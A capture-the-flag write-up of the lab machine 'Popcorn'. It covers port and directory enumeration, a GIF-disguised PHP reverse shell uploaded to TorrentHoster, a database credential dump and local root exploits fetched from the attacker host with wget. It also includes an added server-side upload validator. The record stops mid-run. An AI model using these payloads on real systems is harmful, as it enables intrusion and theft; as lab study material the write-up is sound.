Popcorn
Ports scan
u505@kali:~/HTB/Machines/Popcorn$ sudo masscan -e tun0 -p1-65535,U:1-65535 10.10.10.6 --rate=1000
Starting masscan 1.0.5 at 2020-03-09 02:45:12 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 22/tcp on 10.10.10.6
Discovered open port 80/tcp on 10.10.10.6
u505@kali:~/HTB/Machines/Popcorn$ nmap -sC -sV 10.10.10.6
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-08 22:45 EDT
Nmap scan report for popcorn.htb (10.10.10.6)
Host is up (0.057s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_  2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open  http    Apache httpd 2.2.12 ((Ubuntu))
|_http-server-header: Apache/2.2.12 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.11 seconds
Web server
Dirsearch
u505@kali:~/HTB/Machines/Popcorn$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -e "txt,html" -f -u http://popcorn.htb

  _|. _ _  _  _  _ _|_    v0.3.9
 (_||| _) (/_(_|| (_| )

Extensions: txt, html | HTTP method: get | Threads: 10 | Wordlist size: 13832

Error Log: /opt/utils/dirsearch/logs/errors-20-03-08_22-48-00.log

Target: http://popcorn.htb

[22:48:00] Starting: 
[22:48:00] 403 -  284B - /.html
[22:48:00] 403 -  292B - /.htpasswd.txt
[22:48:00] 403 -  293B - /.htpasswd.html
[22:48:11] 403 -  287B - /cgi-bin/
[22:48:17] 403 -  283B - /doc/
[22:48:26] 200 -   68KB - /icons/
[22:48:26] 200 -  177B - /index.html
[22:48:52] 200 -   48KB - /test/
[22:48:53] 200 -   11KB - /torrent/
[22:48:56] 403 -  293B - /server-status/

Task Completed
Test folder
The test folder shows a phpinfo page.
Torrent folder
The torrent folder hosts the TorrentHoster PHP application.
Second run of dirsearch on the torrent folder
u505@kali:~/HTB/Machines/Popcorn$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -e "txt,php" -f -u http://popcorn.htb/torrent/

  _|. _ _  _  _  _ _|_    v0.3.9
 (_||| _) (/_(_|| (_| )

Extensions: txt, php | HTTP method: get | Threads: 10 | Wordlist size: 13832

Error Log: /opt/utils/dirsearch/logs/errors-20-03-08_23-09-12.log

Target: http://popcorn.htb/torrent/

[23:09:12] Starting: 
[23:09:13] 403 -  300B - /torrent/.htpasswd.txt
[23:09:13] 403 -  300B - /torrent/.htpasswd.php
[23:09:16] 200 -   80B - /torrent/admin/
[23:09:21] 200 -    9KB - /torrent/browse.php
[23:09:21] 200 -    9KB - /torrent/browse/
[23:09:24] 200 -  936B - /torrent/comment.php
[23:09:24] 200 -  936B - /torrent/comment/
[23:09:25] 200 -    0B - /torrent/config.php
[23:09:25] 200 -    0B - /torrent/config/
[23:09:27] 200 -  899B - /torrent/css/
[23:09:27] 200 -  918B - /torrent/database/
[23:09:29] 200 -    0B - /torrent/download.php
[23:09:29] 200 -    0B - /torrent/download/
[23:09:30] 200 -    0B - /torrent/edit.php
[23:09:30] 200 -    0B - /torrent/edit/
[23:09:37] 200 -    2KB - /torrent/health/
[23:09:38] 200 -   11KB - /torrent/images/
[23:09:38] 200 -   11KB - /torrent/index.php
[23:09:38] 200 -   11KB - /torrent/index/
[23:09:38] 200 -   11KB - /torrent/index.php/
[23:09:41] 200 -    1KB - /torrent/js/
[23:09:42] 200 -    2KB - /torrent/lib/
[23:09:43] 200 -    8KB - /torrent/login.php
[23:09:43] 200 -    8KB - /torrent/login/
[23:09:43] 200 -  182B - /torrent/logout.php
[23:09:43] 200 -  182B - /torrent/logout/
[23:09:55] 200 -    1KB - /torrent/readme/
[23:09:57] 200 -  964B - /torrent/rss.php
[23:09:57] 200 -  964B - /torrent/rss/
[23:09:58] 200 -    4B - /torrent/secure.php
[23:09:58] 200 -    4B - /torrent/secure/
[23:10:04] 200 -    5KB - /torrent/templates/
[23:10:05] 200 -    2KB - /torrent/thumbnail.php
[23:10:05] 200 -    2KB - /torrent/thumbnail/
[23:10:05] 200 -    0B - /torrent/torrents/
[23:10:05] 200 -    6KB - /torrent/torrents.php
[23:10:07] 200 -    1KB - /torrent/upload/
[23:10:07] 200 -    0B - /torrent/upload_file.php
[23:10:07] 200 -    0B - /torrent/upload_file/
[23:10:07] 200 -    8KB - /torrent/upload.php
[23:10:07] 200 -   80B - /torrent/users/

Task Completed
Sign up
Upload reverse shell
Once registered, the application lets us upload torrents. We create a fake one.
u505@kali:~/HTB/Machines/Popcorn$ buildtorrent -a "http://tracker.example.com:6969/announce" u505.php.png u505.torrent
49640 : u505.php.png
hashing 1 pieces [==================================================]
We upload it; the upload takes a while.
On the torrent details page, we click on edit. The plan is to upload a reverse shell as the screenshot.
u505@kali:~/HTB/Machines/Popcorn$ rlwrap nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
The screenshot field only accepts image files. We prepend GIF89 to our reverse shell so that the file's magic number identifies it as a GIF, and we give it an image extension.
u505@kali:~/HTB/Machines/Popcorn$ head -n 2 u505.php.png
GIF89<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
u505@kali:~/HTB/Machines/Popcorn$ grep CHANGE u505.php.png
$ip = '10.10.14.28';  // CHANGE THIS
$port = 4444;       // CHANGE THIS
u505@kali:~/HTB/Machines/Popcorn$ file u505.php.png
u505.php.png: GIF image data 28735 x 28776
Before uploading the file, we turn on Burp to intercept the request.
In the intercepted request, the file name is changed to the .php extension.
Our PHP file has been uploaded. The Content-Type sent was image/png while the file's magic number says GIF, which shows that the content type was determined from the file extension on the client side rather than from the file's contents.
Browsing the upload folder, we find our file.
Clicking on the uploaded file triggers the reverse shell.
u505@kali:~/HTB/Machines/Popcorn$ rlwrap nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.6.
Ncat: Connection from 10.10.10.6:58095.
Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux
 06:04:54 up  1:24,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$ whoami
www-data
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@popcorn:/$ stty raw -echo
stty raw -echo
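The upload above worked because the application trusted the client-supplied Content-Type and file name. As an added example (not code from this writeup or from TorrentHoster), the validator below does on the server what was left to the client: it allowlists the extension, refuses double extensions, sniffs the full image signature, compares it with the declared Content-Type and searches the body for PHP tags. Re-encoding the image and storing uploads outside the web root remain the stronger controls.

```python
"""Server-side checks for an image-upload field (added example, not
TorrentHoster code). It refuses the 'GIF89<?php' polyglot named
u505.php.png that the writeup uploaded with Content-Type image/png."""
import re
from typing import List, Optional, Tuple

ALLOWED_EXT = {"png", "gif", "jpg", "jpeg"}

# Full magic numbers. A bare 'GIF89' prefix is not a complete GIF signature,
# so libmagic-style leniency is deliberately not reproduced here.
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
    "jpg": (b"\xff\xd8\xff",),
}
MIME_FOR = {"png": "image/png", "gif": "image/gif", "jpg": "image/jpeg"}

# Extensions Apache/mod_php may execute; flagged wherever they appear in the name.
EXECUTABLE_EXT = {"php", "php3", "php4", "php5", "phtml", "phar"}

# Server-side code markers that have no business inside an image file.
CODE_MARKERS = re.compile(rb"<\?php|<\?=|<script", re.IGNORECASE)


def normalise_ext(ext: str) -> str:
    return "jpg" if ext == "jpeg" else ext


def sniff_image_type(data: bytes) -> Optional[str]:
    """Return 'png', 'gif' or 'jpg' from the leading bytes, else None."""
    for kind, signatures in MAGIC.items():
        if any(data.startswith(sig) for sig in signatures):
            return kind
    return None


def validate_upload(filename: str, declared_type: str, data: bytes) -> Tuple[bool, List[str]]:
    """Return (accepted, reasons); accepted is True only when reasons is empty."""
    reasons: List[str] = []
    parts = filename.lower().split(".")
    ext = parts[-1] if len(parts) > 1 else ""

    if ext not in ALLOWED_EXT:
        reasons.append(f"extension '.{ext}' is not an allowed image extension")

    # 'shell.php.png' style names are refused outright.
    hidden = sorted(set(parts[1:-1]) & EXECUTABLE_EXT)
    if hidden:
        reasons.append(f"file name embeds an executable extension: {hidden}")

    sniffed = sniff_image_type(data)
    if sniffed is None:
        reasons.append("leading bytes are not a complete PNG, GIF or JPEG signature")
    else:
        if ext in ALLOWED_EXT and normalise_ext(ext) != sniffed:
            reasons.append(f"extension '.{ext}' does not match sniffed type {sniffed}")
        if declared_type.lower() != MIME_FOR[sniffed]:
            reasons.append(
                f"declared Content-Type {declared_type} does not match {MIME_FOR[sniffed]}")

    if CODE_MARKERS.search(data):
        reasons.append("file body contains server-side script markers")

    return (not reasons, reasons)


if __name__ == "__main__":
    # Constructed sample mirroring the writeup's upload.
    polyglot = b"GIF89<?php\n// php-reverse-shell - A Reverse Shell implementation in PHP\n"
    print(validate_upload("u505.php.png", "image/png", polyglot))
    # A genuine minimal GIF with a matching name and Content-Type is accepted.
    real_gif = b"GIF89a\x01\x00\x01\x00\x00\x00\x00;"
    print(validate_upload("screenshot.gif", "image/gif", real_gif))
```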
User flag
www-data@popcorn:/$ cd /home/george/
www-data@popcorn:/home/george$ cat user.txt
<USER_FLAG>
MySQL enumeration
www-data@popcorn:/var/www/torrent$ cat config.php
...
$CFG->host = "localhost";
$CFG->dbName = "torrenthoster"; //db name
$CFG->dbUserName = "torrent"; //db username
$CFG->dbPassword = "SuperSecret!!"; //db password
www-data@popcorn:/var/www/torrent$ mysql -u torrent -p
Enter password: SuperSecret!!

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 27764
Server version: 5.1.37-1ubuntu5.5 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> use torrenthoster;
mysql> select * from users;
+----+----------+----------------------------------+-----------+----------------------+---------------------+---------------------+
| id | userName | password                         | privilege | email                | joined              | lastconnect         |
+----+----------+----------------------------------+-----------+----------------------+---------------------+---------------------+
|  3 | Admin    | d5bfedcee289e5e05b86daad8ee3e2e2 | admin     | admin@yourdomain.com | 2007-01-06 21:12:46 | 2007-01-06 21:12:46 |
|  5 | u505     | 02538cfd8f17efabdbe26264ead63da6 | user      | abc@gmail.com        | 2020-03-09 05:07:54 | 2020-03-09 05:07:54 |
+----+----------+----------------------------------+-----------+----------------------+---------------------+---------------------+
2 rows in set (0.00 sec)
We try to crack the MD5 hash with a dictionary attack, but it's unsuccessful.
u505@kali:~/HTB/Machines/Popcorn$ cat hash.txt
d5bfedcee289e5e05b86daad8ee3e2e2
u505@kali:~/HTB/Machines/Popcorn$ hashcat -m 0 hash.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
...
Session..........: hashcat
Status...........: Exhausted
Hash.Type........: MD5
Hash.Target......: d5bfedcee289e5e05b86daad8ee3e2e2
Time.Started.....: Mon Mar  9 00:15:36 2020 (2 secs)
Time.Estimated...: Mon Mar  9 00:15:38 2020 (0 secs)
Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  9033.3 kH/s (2.73ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 14344384/14344384 (100.00%)
Rejected.........: 0/14344384 (0.00%)
Restore.Point....: 14344384/14344384 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: $HEX[303334323137383439] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Temp: 44c Util: 43% Core:1032MHz Mem:2505MHz Bus:16

Started: Mon Mar  9 00:15:32 2020
Stopped: Mon Mar  9 00:15:39 2020
Escalation of privileges
This is an old machine, with an old Ubuntu version, and an old kernel.
www-data@popcorn:/$ uname -a
Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux
www-data@popcorn:/home$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 9.10
Release:        9.10
Codename:       karmic
There are several ways to escalate privileges.
u505@kali:~/HTB/Machines/Popcorn$ searchsploit Ubuntu 9.10
-------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                              |  Path
                                                                                            | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------- ----------------------------------------
Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (1)          | exploits/linux/local/14273.sh
Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (2)          | exploits/linux/local/14339.sh
ReiserFS (Linux Kernel 2.6.34-rc3 / RedHat / Ubuntu 9.10) - 'xattr' Local Privilege Escalati | exploits/linux/local/12130.py
Ubuntu 19.10 - Refcount Underflow and Type Confusion in shiftfs                              | exploits/linux/dos/47693.txt
Ubuntu 19.10 - ubuntu-aufs-modified mmap_region() Breaks Refcounting in overlayfs/shiftfs Er | exploits/linux/dos/47692.txt
-------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
- Exploit 14339 (CVE-2010-0832) is a good candidate.
- Exploit 12130 (CVE-2010-1146) needs a mounted ReiserFS partition with extended attributes, and the target doesn't meet that requirement.
www-data@popcorn:/tmp$ grep reiserfs /etc/fstab
We search by kernel version.
u505@kali:~/HTB/Machines/Popcorn$ searchsploit Linux Kernel 2.6 | grep "Privilege Escalation"
Linux Kernel 2.2.25/2.4.24/2.6.2 - 'mremap()' Local Privilege Escalation                    | exploits/linux/local/160.c
Linux Kernel 2.4.1 < 2.4.37 / 2.6.1 < 2.6.32-rc5 - 'pipe.c' Local Privilege Escalation (3)  | exploits/linux/local/9844.py
Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Privilege Escalation               | exploits/linux/local/145.c
Linux Kernel 2.4.30/2.6.11.5 - BlueTooth 'bluez_sock_create' Local Privilege Escalation     | exploits/linux/local/25289.c
Linux Kernel 2.4.4 < 2.4.37.4 / 2.6.0 < 2.6.30.4 - 'Sendpage' Local Privilege Escalation (Me | exploits/linux/local/19933.rb
Linux Kernel 2.4.x/2.6.x - 'Bluez' BlueTooth Signed Buffer Index Privilege Escalation (2)   | exploits/linux/local/926.c
Linux Kernel 2.4.x/2.6.x - 'uselib()' Local Privilege Escalation (3)                        | exploits/linux/local/895.c
Linux Kernel 2.4.x/2.6.x - BlueTooth Signed Buffer Index Privilege Escalation (1)           | exploits/linux/local/25288.c
Linux Kernel 2.4/2.6 (Fedora 11) - 'sock_sendpage()' Local Privilege Escalation (2)         | exploits/linux/local/9598.txt
Linux Kernel 2.4/2.6 (x86-64) - System Call Emulation Privilege Escalation                  | exploits/linux_x86-64/local/4460.c
Linux Kernel 2.4/2.6 - 'sock_sendpage()' Local Privilege Escalation (3)                     | exploits/linux/local/9641.txt
Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV < 1.4.1 - Local Privilege Escalation (1 | exploits/linux/local/8478.sh
Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04) UDEV < 1.4.1 - Local Privilege Escalation (2)  | exploits/linux/local/8572.c
Linux Kernel 2.6.0 < 2.6.31 - 'pipe.c' Local Privilege Escalation (1)                       | exploits/linux/local/33321.c
Linux Kernel 2.6.10 < 2.6.31.5 - 'pipe.c' Local Privilege Escalation                        | exploits/linux/local/40812.c
Linux Kernel 2.6.13 < 2.6.17.4 - 'logrotate prctl()' Local Privilege Escalation             | exploits/linux/local/2031.c
Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Local Privilege Escalation (1)               | exploits/linux/local/2004.c
Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Local Privilege Escalation (2)               | exploits/linux/local/2005.c
Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Local Privilege Escalation (3)               | exploits/linux/local/2006.c
Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Local Privilege Escalation (4)               | exploits/linux/local/2011.sh
Linux Kernel 2.6.17 - 'Sys_Tee' Local Privilege Escalation                                  | exploits/linux/local/29714.txt
Linux Kernel 2.6.17 < 2.6.24.1 - 'vmsplice' Local Privilege Escalation (2)                  | exploits/linux/local/5092.c
Linux Kernel 2.6.17.4 - 'proc' Local Privilege Escalation                                   | exploits/linux/local/2013.c
Linux Kernel 2.6.18 < 2.6.18-20 - Local Privilege Escalation                                | exploits/linux/local/10613.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation ( | exploits/linux/local/40847.cpp
Linux Kernel 2.6.23 < 2.6.24 - 'vmsplice' Local Privilege Escalation (1)                    | exploits/linux/local/5093.c
Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Local Privilege Escalation          | exploits/linux_x86-64/local/15024.c
Linux Kernel 2.6.28/3.0 (DEC Alpha Linux) - Local Privilege Escalation                      | exploits/linux/local/17391.c
Linux Kernel 2.6.29 - 'ptrace_attach()' Race Condition Privilege Escalation                 | exploits/linux/local/8678.c
Linux Kernel 2.6.30 < 2.6.30.1 / SELinux (RHEL 5) - Local Privilege Escalation              | exploits/linux/local/9191.txt
Linux Kernel 2.6.32 (Ubuntu 10.04) - '/proc' Handling SUID Privilege Escalation             | exploits/linux/local/41770.txt
Linux Kernel 2.6.32 - 'pipe.c' Local Privilege Escalation (4)                               | exploits/linux/local/10018.sh
Linux Kernel 2.6.32 < 3.x (CentOS 5/6) - 'PERF_EVENTS' Local Privilege Escalation (1)       | exploits/linux/local/25444.c
Linux Kernel 2.6.36-rc8 - 'RDS Protocol' Local Privilege Escalation                         | exploits/linux/local/15285.c
Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalation    | exploits/linux/local/15704.c
Linux Kernel 2.6.39 < 3.2.2 (x86/x64) - 'Mempodipper' Local Privilege Escalation (2)        | exploits/linux/local/35161.c
Linux Kernel 2.6.x (Gentoo 2.6.29rc1) - 'ptrace_attach' Local Privilege Escalation          | exploits/linux/local/8673.c
Linux Kernel 2.6.x - 'SYS_EPoll_Wait' Local Integer Overflow / Local Privilege Escalation (1 | exploits/linux/local/25202.c
Linux Kernel 2.6.x - 'pipe.c' Local Privilege Escalation (2)                                | exploits/linux/local/33322.c
Linux Kernel 2.6.x - Ext4 'move extents' ioctl Privilege Escalation                         | exploits/linux/local/33395.txt
Linux Kernel 2.6.x - Ptrace Privilege Escalation                                            | exploits/linux/local/30604.c
Linux Kernel < 2.6.11.5 - BlueTooth Stack Privilege Escalation                              | exploits/linux/local/4756.c
Linux Kernel < 2.6.19 (Debian 4) - 'udp_sendmsg' Local Privilege Escalation (3)             | exploits/linux/local/9575.c
Linux Kernel < 2.6.19 (x86/x64) - 'udp_sendmsg' Local Privilege Escalation (2)              | exploits/linux/local/9574.txt
Linux Kernel < 2.6.22 - 'ftruncate()'/'open()' Local Privilege Escalation                   | exploits/linux/local/6851.c
Linux Kernel < 2.6.28 - 'fasync_helper()' Local Privilege Escalation                        | exploits/linux/local/33523.c
Linux Kernel < 2.6.29 - 'exit_notify()' Local Privilege Escalation                          | exploits/linux/local/8369.sh
Linux Kernel < 2.6.34 (Ubuntu 10.10 x86) - 'CAP_SYS_ADMIN' Local Privilege Escalation (1)   | exploits/linux_x86/local/15916.c
Linux Kernel < 2.6.34 (Ubuntu 10.10 x86/x64) - 'CAP_SYS_ADMIN' Local Privilege Escalation (2 | exploits/linux/local/15944.c
Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32) - 'CAN BCM' Local Privilege Escalation    | exploits/linux/local/14814.c
Linux Kernel < 2.6.36-rc4-git2 (x86-64) - 'ia32syscall' Emulation Privilege Escalation      | exploits/linux_x86-64/local/15023.c
Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation        | exploits/linux/local/17787.c
Linux Kernel < 2.6.37-rc2 - 'ACPI custom_method' Local Privilege Escalation                 | exploits/linux/local/15774.c
Samba 2.2.8 (Linux Kernel 2.6 / Debian / Mandrake) - Share Privilege Escalation             | exploits/linux/local/23674.txt
- Exploit 9844 is a race condition; the target has only one CPU, so there is little chance it will work.
www-data@popcorn:/$ cat /proc/cpuinfo | grep processor
processor	: 0
- Exploit 15704 (Full Nelson, CVE-2010-4258, CVE-2010-3850, CVE-2010-3849) should work on Ubuntu 9.10.
- Exploit 15285 (CVE-2010-3904) is a good candidate too.
- Exploit 15916 didn't work.
www-data@popcorn:/tmp$ ./15916
[*] Testing Phonet support and CAP_SYS_ADMIN...
[*] You don't have CAP_SYS_ADMIN.
- Exploit 14814 didn't work either, and it stalled the machine.
www-data@popcorn:/tmp$ ./14814
[+] looking for symbols...
...
[+] re-smashing the shmid_kernel with exploit payload...
Linux Exploit Suggester
LES gives us information similar to what we found manually.
u505@kali:~/HTB/Machines/Popcorn/www$ cp /usr/share/linux-exploit-suggester/Linux_Exploit_Suggester.pl ./
Transfer to the target.
www-data@popcorn:/tmp$ wget http://10.10.14.28/Linux_Exploit_Suggester.pl
--2020-03-10 12:14:33--  http://10.10.14.28/Linux_Exploit_Suggester.pl
Connecting to 10.10.14.28:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 12916 (13K) [text/x-perl]
Saving to: `Linux_Exploit_Suggester.pl'

100%[======================================>] 12,916      --.-K/s   in 0.04s

2020-03-10 12:14:33 (296 KB/s) - `Linux_Exploit_Suggester.pl' saved [12916/12916]
Execution
www-data@popcorn:/tmp$ ./Linux_Exploit_Suggester.pl

Kernel local: 2.6.31

Possible Exploits:
[+] half_nelson3
   Alt: econet   CVE-2010-4073
   Source: http://www.exploit-db.com/exploits/17787/
[+] reiserfs
   CVE-2010-1146
   Source: http://www.exploit-db.com/exploits/12130/
[+] pktcdvd
   CVE-2010-3437
   Source: http://www.exploit-db.com/exploits/15150/
[+] american-sign-language
   CVE-2010-4347
   Source: http://www.securityfocus.com/bid/45408/
[+] half_nelson
   Alt: econet   CVE-2010-3848
   Source: http://www.exploit-db.com/exploits/6851
[+] do_pages_move
   Alt: sieve   CVE-2010-0415
   Source: Spenders Enlightenment
[+] pipe.c_32bit
   CVE-2009-3547
   Source: http://www.securityfocus.com/data/vulnerabilities/exploits/36901-1.c
[+] can_bcm
   CVE-2010-2959
   Source: http://www.exploit-db.com/exploits/14814/
[+] rds
   CVE-2010-3904
   Source: http://www.exploit-db.com/exploits/15285/
[+] ptrace_kmod2
   Alt: ia32syscall,robert_you_suck   CVE-2010-3301
   Source: http://www.exploit-db.com/exploits/15023/
[+] half_nelson1
   Alt: econet   CVE-2010-3848
   Source: http://www.exploit-db.com/exploits/17787/
[+] half_nelson2
   Alt: econet   CVE-2010-3850
   Source: http://www.exploit-db.com/exploits/17787/
[+] video4linux
   CVE-2010-3081
   Source: http://www.exploit-db.com/exploits/15024/
CVE-2010-0832 (Exploitdb 14339)
From https://nvd.nist.gov/vuln/detail/CVE-2010-0832:

pam_motd (aka the MOTD module) in libpam-modules before 1.1.0-2ubuntu1.1 in PAM on Ubuntu 9.10 and libpam-modules before 1.1.1-2ubuntu5 in PAM on Ubuntu 10.04 LTS allows local users to change the ownership of arbitrary files via a symlink attack on .cache in a user's home directory, related to "user file stamps" and the motd.legal-notice file.

The installed libpam-modules version is lower than 1.1.0-2ubuntu1.1, so the vulnerability should work.
www-data@popcorn:/tmp$ dpkg --list | grep libpam-modules
ii libpam-modules 1.1.0-2ubuntu1 Pluggable Authentication Modules for PAM
Script download
u505@kali:~/HTB/Machines/Popcorn$ wget https://raw.githubusercontent.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack/master/2010/CVE-2010-0832.sh
--2020-03-09 00:22:43--  https://raw.githubusercontent.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack/master/2010/CVE-2010-0832.sh
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 199.232.32.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|199.232.32.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3042 (3.0K) [text/plain]
Saving to: ‘CVE-2010-0832.sh’

CVE-2010-0832.sh    100%[==========================================================================>]   2.97K  --.-KB/s    in 0s

2020-03-09 00:22:43 (23.8 MB/s) - ‘CVE-2010-0832.sh’ saved [3042/3042]

u505@kali:~/HTB/Machines/Popcorn$ mkdir www
u505@kali:~/HTB/Machines/Popcorn$ mv CVE-2010-0832.sh www/
Start web listener
u505@kali:~/HTB/Machines/Popcorn$ cd www/
u505@kali:~/HTB/Machines/Popcorn/www$ sudo python -m SimpleHTTPServer 80
[sudo] password for u505: 
Serving HTTP on 0.0.0.0 port 80 ...
Transfer to target
www-data@popcorn:/$ cd /tmp
www-data@popcorn:/tmp$ wget http://10.10.14.28/CVE-2010-0832.sh
--2020-03-09 06:24:16--  http://10.10.14.28/CVE-2010-0832.sh
Connecting to 10.10.14.28:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3042 (3.0K) [text/x-sh]
Saving to: `CVE-2010-0832.sh'

100%[======================================>] 3,042       --.-K/s   in 0s

2020-03-09 06:24:16 (274 MB/s) - `CVE-2010-0832.sh' saved [3042/3042]

www-data@popcorn:/tmp$ chmod +x CVE-2010-0832.sh
Execution
www-data@popcorn:/tmp$ ./CVE-2010-0832.sh
[*] Ubuntu PAM MOTD local root
[*] SSH key set up
[*] spawn ssh
www-data@localhost's password: dfsfsd
Permission denied, please try again.
www-data@localhost's password: dsdsds
Permission denied, please try again.
www-data@localhost's password: dsdsf
Permission denied (publickey,password).
[-] Own /etc/passwd failed
[*] SSH key removed
It fails when the server asks for the www-data password, which we don't know. We rerun the script in debug mode to find the issue.
www-data@popcorn:/tmp$ bash -x CVE-2010-0832.sh
+ P=toor:x:0:0:root:/root:/bin/bash
+ S='toor:$6$tPuRrLW7$m0BvNoYS9FEF9/Lzv6PQospujOKt0giv.7JNGrCbWC1XdhmlbnTWLKyzHz.VZwCcEcYQU5q2DLX.cI7NQtsNz1:14798:0:99999:7:::'
+ echo '[*] Ubuntu PAM MOTD local root'
[*] Ubuntu PAM MOTD local root
++ which ssh
+ '[' -z /usr/bin/ssh ']'
++ which ssh-keygen
+ '[' -z /usr/bin/ssh-keygen ']'
++ ps -u root
++ grep sshd
+ '[' -z ' 1046 ?        00:00:00 sshd' ']'
++ mktemp -u
+ KEY=/tmp/tmp.bymVMnm2JH
+ key_create
+ backup /var/www/.ssh/authorized_keys
+ '[' -e /var/www/.ssh/authorized_keys ']'
+ '[' -e /var/www/.ssh/authorized_keys ']'
+ return 0
+ ssh-keygen -q -t rsa -N '' -C pam -f /tmp/tmp.bymVMnm2JH
+ '[' '!' -d /var/www/.ssh ']'
+ mv /tmp/tmp.bymVMnm2JH.pub /var/www/.ssh/authorized_keys
+ echo '[*] SSH key set up'
[*] SSH key set up
+ backup /var/www/.cache
+ '[' -e /var/www/.cache ']'
+ '[' -e /var/www/.cache ']'
+ return 0
+ own /etc/passwd
+ '[' -e /var/www/.cache ']'
+ ln -s /etc/passwd /var/www/.cache
+ echo '[*] spawn ssh'
[*] spawn ssh
+ ssh -o 'NoHostAuthenticationForLocalhost yes' -i /tmp/tmp.bymVMnm2JH localhost true
www-data@localhost's password: fddf
Permission denied, please try again.
www-data@localhost's password: fdfd
Permission denied, please try again.
www-data@localhost's password: fddf
Permission denied (publickey,password).
+ '[' -w /etc/passwd ']'
+ echo '[-] Own /etc/passwd failed'
[-] Own /etc/passwd failed
+ restore /var/www/.cache
+ '[' -e /var/www/.cache ']'
+ rm -rf /var/www/.cache
+ '[' -e /var/www/.cache.bak ']'
+ return 0
+ bye
+ key_remove
+ rm -f /tmp/tmp.bymVMnm2JH
+ restore /var/www/.ssh/authorized_keys
+ '[' -e /var/www/.ssh/authorized_keys ']'
+ rm -rf /var/www/.ssh/authorized_keys
+ '[' -e /var/www/.ssh/authorized_keys.bak ']'
+ return 0
+ echo '[*] SSH key removed'
[*] SSH key removed
+ exit 1
The script creates an SSH key for www-data, but when ssh tries to log in with the private key, authentication falls back to a password.
www-data@popcorn:/tmp$ ls -ld /var/www/.ssh/
drwxrwxrwx 2 www-data www-data 4096 Mar  9 07:11 /var/www/.ssh/
www-data@popcorn:/tmp$ chmod 700 /var/www/.ssh/
www-data@popcorn:/tmp$ ls -ld /var/www/.ssh/
drwx------ 2 www-data www-data 4096 Mar  9 07:11 /var/www/.ssh/
The permissions of the .ssh directory were wide open, and sshd refuses to use an authorized_keys file kept in such a directory. Once corrected, the script can log in over ssh with the private key and exploit the vulnerability.
www-data@popcorn:/tmp$ bash CVE-2010-0832.sh
[*] Ubuntu PAM MOTD local root
[*] SSH key set up
[*] spawn ssh
